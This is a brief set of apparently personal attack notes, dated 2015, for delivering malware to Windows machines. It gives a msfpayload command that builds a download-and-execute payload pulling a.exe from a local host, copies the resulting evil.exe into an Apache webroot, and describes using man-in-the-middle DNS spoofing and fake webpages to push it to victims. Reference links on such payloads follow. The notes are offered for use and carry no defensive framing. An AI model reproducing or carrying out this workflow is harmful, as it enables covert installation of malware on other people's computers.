"generate payload"
sudo msfpayload windows/download_exec url="http//192.168.1.68/a.exe" X > evil.exe
"port payload to apache webroot"
cp evil.exe /var/www/evil.exe
then use "MitM+DNS_spoof" to point to apache evil.exe,
thats going to make a.exe in C:\windows\a.exe and execute it
Remark: clone 'firefox_xpi priv8.sh module' way to inject the URL into the HTML fake webpage
"SERVER SIDE EXPLOITATION"
send a url link to client
-:[ server-side exploitation methods ]:-
http://www.governmentsecurity.org/forum/topic/18370-download-and-exec-payload/
http://www.r00tsec.com/2013/02/howto-single-staged-stagers-payload-of.html
http://www.room362.com/blog/2011/06/26/metasploit-payloads-explained-part-1/
http://www.thegreycorner.com/2010/05/download-and-execute-script-shellcode.html
http://pt.scribd.com/doc/176198248/Back-Track-Tutorials#scribd
Last edit: pedro ubuntu 2015-01-04